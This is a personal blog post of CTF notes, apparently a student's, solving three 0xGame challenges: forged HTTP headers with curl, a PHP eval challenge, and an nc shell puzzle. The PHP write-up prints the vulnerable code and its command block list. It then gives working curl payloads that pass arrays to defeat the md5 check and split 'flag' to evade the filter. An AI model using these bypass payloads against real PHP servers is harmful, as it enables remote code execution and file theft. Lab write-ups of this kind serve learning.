mobile wallpaper 1mobile wallpaper 2mobile wallpaper 3mobile wallpaper 4mobile wallpaper 5mobile wallpaper 6
Profile Image of the Author
超级玉米人
公告
欢迎来到我的博客!这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★
标签
496 字
1 分钟
day4
2025-10-18
ctf
ctf
/
web
/
python

CTF+ 题目 Http的真理,我已解明#

标签: 0xGame Web#

题目要求我们用指定的GET POST COOKIE 传入特定的参数 使用特定的浏览器 使用 表示经过代理或者网关, 以及从指定的网站跳转过来 所以得出curl指令

curl -A "Safari" -H "Referer: www.mihoyo.com" -H "Via: clash" -d "http=good" -b "Sean=god" http://80-95a23249-8263-444a-93e7-a0d59b688e83.challenge.ctfplus.cn/?hello=web

得到flag 0XGame{Congratuation_You_Are_Http_God!!!}

所使用的 curl 参数

-H "Vai: XXX" 指定代理
-H "Referer: XXX" 请求由什么网站跳转到这里


-A            指定访问浏览器
-d            POST 传输
-b            COOKIE 传输
...

CTF+ 题目 RCE1#

标签: 0xGame Web#

进入靶机发现如下php代码

<?php
error_reporting(0);
highlight_file(__FILE__);
$rce1 = $_GET['rce1'];
$rce2 = $_POST['rce2'];
$real_code = $_POST['rce3'];


$pattern = '/(?:\d|[\$%&#@*]|system|cat|flag|ls|echo|nl|rev|more|grep|cd|cp|vi|passthru|shell|vim|sort|strings)/i';


function check(string $text): bool {
    global $pattern;
    return (bool) preg_match($pattern, $text);
}




if (isset($rce1) && isset($rce2)){
    if(md5($rce1) === md5($rce2) && $rce1 !== $rce2){
        if(!check($real_code)){
            eval($real_code);
        } else {
            echo "Don't hack me ~";
        }
    } else {
        echo "md5 do not match correctly";
    }
}
else{
    echo "Please provide both rce1 and rce2";
}
?>

发现需要使用GET 传入参数rce1, 使用POST 传入参数 rce2, rce3(real_code) 第一层if语句可以看出 本题目要求 rce1, rce2 的MD5哈希值相同但是字符串不同,而第二层if则要求 输入的rce3 中的命令必须不在正则表达式
/(?:\d|[$%&#@*]|system|cat|flag|ls|echo|nl|rev|more|grep|cd|cp|vi|passthru|shell|vim|sort|strings)/i
的筛选范围内

故可以 将rce2 rce1 设定为 列表因为 php中的md5 不能处理列表 都会返回null,或者将其设定为 经过md5 转化后为0e开头的字符串,因为php会将这种数据视为科学计数法而绕过

所以我们可以构建出curl命令为:

curl -d "rce2[]=12123&rce3=print_r(scandir('/'));" http://80-a997745a-c1b5-4f34-aa06-65d2d675f958.challenge.ctfplus.cn/?rce1[]=123

发现 flag文件 故接下来的问题是怎么 在正则表达式的限制下 读取到文件

所以构件出如下命令:

curl -d "rce2[]=1&rce3=show_source('/fl'.'ag');" "http://80-a997745a-c1b5-4f34-aa06-65d2d675f958.challenge.ctfplus.cn/?rce1[]=2"

成功得到flag: 0xGame{This_is_Your_First_Stop_to_RCE!!!}

笔记#

php 常用的函数

  1. file_get_contents() 一次性读取整个文件内容到字符串中。

  2. file() 将整个文件读取到数组中,每行作为数组的一个元素。

  3. readfile() 直接读取文件并输出到浏览器,适合文件下载。

  4. show_source();

  5. include

  6. scandir() 获取目录

  7. print_r() 打印

CTF+ 题目 命令执行🤔#

标签:0xGame PWN#

进入题目提供的nc地址时 发现除了echo, ls命令其他所有命令都不能使用 使用ls 发现文件目录中存在flag 文件 继续ls -l 该文件发现该文件是一个可执行文件所以输入

. ./flag

执行文件得到flag:0xGame{y0u_c4n_4ls0_3x3cu73_c0mm4nd_w17h0u7_5h_4nd_c47}

分享

如果这篇文章对你有帮助,欢迎分享给更多人!

day4
https://yoyolp.github.io/posts/other/day4/
作者
超级玉米人
发布于
2025-10-18
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时

day3
asm02
相关文章 智能推荐
1
day5
ctf 一些题目和笔记
2
day6
ctf 一些题目+ ZAP工具的使用 + SQL 相关
3
day1
ctf 写了两道题目
4
day7
ctf 一些题目+ ZAP工具的使用 + SQL 相关wn 入门指北,Pwn 环境配置
5
day2
ctf 写了两道题目
随机文章 随机推荐
1
uaf
ctf 2026-03-19
2
day2
ctf 2025-10-18
3
program01
linux 2025-11-11
4
c03
language 2025-11-13
5
randomBreak
ctf 2026-03-29
© 2026 超级玉米人. All Rights Reserved. / RSS / Atom / Sitemap
Powered by Astro & Mizuki  Version 9.0

目录